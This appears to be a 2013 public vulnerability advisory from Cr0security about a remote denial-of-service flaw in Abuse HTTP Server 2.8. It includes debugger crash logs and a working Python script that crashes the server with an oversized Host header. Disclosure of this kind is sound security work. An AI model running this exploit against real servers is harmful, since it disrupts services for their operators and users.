Abuse HTTP Server 2.8 Denial Of Service Vulnerability



EKU-ID: 3555 CVE: OSVDB-ID:
Author: Zico Ekel Published: 2013-10-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Advisory Information :
======================
Title : Abuse HTTP Server 2.8 - Remote Denial Of Service
Advisory ID : Cr02013-002
Product : HTTP Server
Vendor : SmartUX
Vulnerable Version(s) : 2.8 and probably prior release
Tested Version : 2.8
Tested On : Windows XP, Windows 7
Vulnerability Type / CWE ID : Improper Resource Shutdown or Release / [CWE-404]
Risk Level : High
CVSSv2 Base Score : 9.7 (AV:N/AC:L/Au:N/C:N/I:P/A:C/E:F/RL:U/RC:C/CDP:LM/TD:H/CR:L/IR:L/AR:H)
Discovered By : Zico (Zee Eichel) Ekel of cr0security - zee[at]cr0security.com - http://www.cr0security.com
   
   
Introduction :
==============
  
Abuse HTTP Server is a small program designed to become a WebServer.
   
- Based on / Copied from : http://abuse-httpd.sourceforge.net/
   
   
Advisory Details:
=================
Abuse HTTP Server suffers from Remote Denial Of Service (DOS). The Attacker could make Abuse HTTP Server disconnect connection while client is connected to Abuse HTTP server.
   
   
Proof Of Concept :
==================
The Attacker run this remote exploit DOS code targeted to remote server host,
and the connection between server and android client will be disconected or terminated.
   
With debugging (Log-using ollydbg) :
  
Log data, item 3
 Address=7C8106E9 (crash address)
 Message=New thread with ID 000006D0 created
Log data, item 2
 Message=Thread 000006D0 terminated, exit code 0
Log data, item 1
 Message=Thread 00000794 terminated, exit code CB (203.)
Log data, item 0
 Message=Process terminated, exit code CB (203.)
  
Register FPU log :
  
EAX 00000000
ECX 7C800000 kernel32.7C800000
EDX 7C97B120 ntdll.7C97B120
EBX 00000000
ESP 0012EDD4
EBP 0012EED0
ESI 7C90DE50 ntdll.ZwTerminateProcess
EDI 000000CB
EIP 7C90E4F4 ntdll.KiFastSystemCallRet
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_CLASS_HAS_WINDOWS (00000584)
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -??? FFFF 00FF00FF 00FF00FF
ST1 empty -??? FFFF 00FF00FF 00FF00FF
ST2 empty -??? FFFF 00FE00B2 006E007A
ST3 empty -??? FFFF 00FE00B2 006B0077
ST4 empty -NAN FFFF FFB36B77 FFB36E7A
ST5 empty -??? FFFF 00FF00B3 006B0077
ST6 empty -??? FFFF 00000000 00000000
ST7 empty -??? FFFF 00800080 00800080
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0
  
SEH chain of main thread:
  
Address    SE handler
0012FC50   kernel32.7C839AC0
0012FCA8   Abuse.0040D7E3
0012FD78   USER32.7E44048F
0012FDD8   USER32.7E44048F
0012FEF0   USER32.7E44048F
0012FF50   USER32.7E44048F
0012FFE0   kernel32.7C839AC0
   
Sample dummy tool for disconected only
======================================
  
--- Python Remote DOS code ---
  
#!/usr/bin/python
  
import socket
import os
import sys
  
crash = "0" * 504
  
buffer="GET / HTTP/1.1\r\n"
buffer+="Host: " + crash + "\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n"
buffer+="Content-Length : 1048580\r\n\r\n"
  
print "[*] Exploit c0ded by Zee Eichel - zee[at]cr0security.com"
print "[*] Change some option in code with your self"
print "[*] Connect to host and send payload"
  
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("192.168.1.101", 80))
expl.send(buffer)
print "[*] Server Disconected"
expl.close()
  
------------- EOF -------------
  
Report-Timeline :
=================
29/09/2013 :    Vendor Contacted / No response.
30/09/2013 :    Public Disclosure.
   
   
Remediation :
=============
There isn't remediation step from the Vendor until this Public Disclosure.
   
   
References :
============
- Common Weakness Enumeration (CWE) - http://cwe.mitre.org
- Share KM - http://abuse-httpd.sourceforge.net/
   
   
About Cr0security :
===================
Cr0security is a company that moved on "Information and Technologies" especially
on Computer Security System, Network Security, and Secure Computer Application
Development. with a reference to the publics needs of using the information system
technology with better security, Cr0security ready to help you to reach secure point
and creating a comfortable moment while you are perform any activities through your
networks or computers at once. In computer software development we also implement the
"Secure Programming". so security of the applications, the data, and the computer will
be strictly maintained. Beside we can act as your Consultant, We can act as your partner
to achieve the best solution.
   
   
Contact Cr0security :
=====================
Email : info[at]cr0security.com
Website : http://www.cr0security.com
   
   
Disclaimer :
============
The information provided in this advisory is provided "as is" without warranty
of any kind. Cr0security disclaims all warranties, either express or implied,
including the warranties of merchantability and fitness for a particular purpose.
In no event shall Cr0security or its suppliers be liable for any damages whatsoever
including direct, indirect, incidental, consequential, loss of business profits or
special damages, even if Cr0security or its suppliers have been advised of the
possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may
not apply.